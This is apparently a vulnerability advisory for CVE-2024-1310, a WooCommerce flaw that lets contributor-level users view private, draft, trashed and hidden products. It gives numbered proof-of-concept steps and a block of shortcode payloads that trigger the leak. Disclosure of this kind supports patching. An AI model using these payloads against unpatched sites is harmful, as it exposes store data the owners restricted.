WooCommerce < 8.6 – Contributor+ Private/Draft Products Access | CVE 2024-1310

Description

The plugin does not prevent users with at least the contributor role from leaking products they shouldn't have access to. (e.g. private, draft and trashed products)

Proof of Concept

1. ADMIN: Install WooCommerce
2. ADMIN: Add products of various visibility and statuses including Publish, Draft, Private, and create an extra one so that you can trash it
3. CONTRIBUTOR: Add a new post and embed one of the shortcode scenarios above (see supporting references for examples too)
4. CONTRIBUTOR: Save the post and preview it
5. CONTRIBUTOR: See product(s) you should not be able to access normally as you lack the expected WooCommerce/WordPress capabilities

## Supporting Material/References
Below are the shortcode patterns I tested with along with what is currently possible.

```
You can embed basic info about any Hidden product:
[product id="ANY_HIDDEN_PRODUCT_ID" visibility="hidden"]

You can embed any Hidden product:
[product_page id="ANY_HIDDEN_PRODUCT_ID"]

You can embed any Private, Draft, Pending Review, Trash product:
[product_page id="ANY_PRODUCT_ID" status="ANY_PRODUCT_STATUS"]
^^^ NOTE: if this is in placed into the block editor, the editor will attempt to load that corresponding product ID on next editor load and prevent further edits to the original post. I've reported this separately to WooCommerce already. It's secure because it checks access rights on it's own.

You can list any Hidden products:
[products visibility="hidden"]

You can list any Hidden products by ID:
[products ids="ANY_HIDDEN_PRODUCT_IDS_COMMA_SEPARATED" visibility="hidden"]
```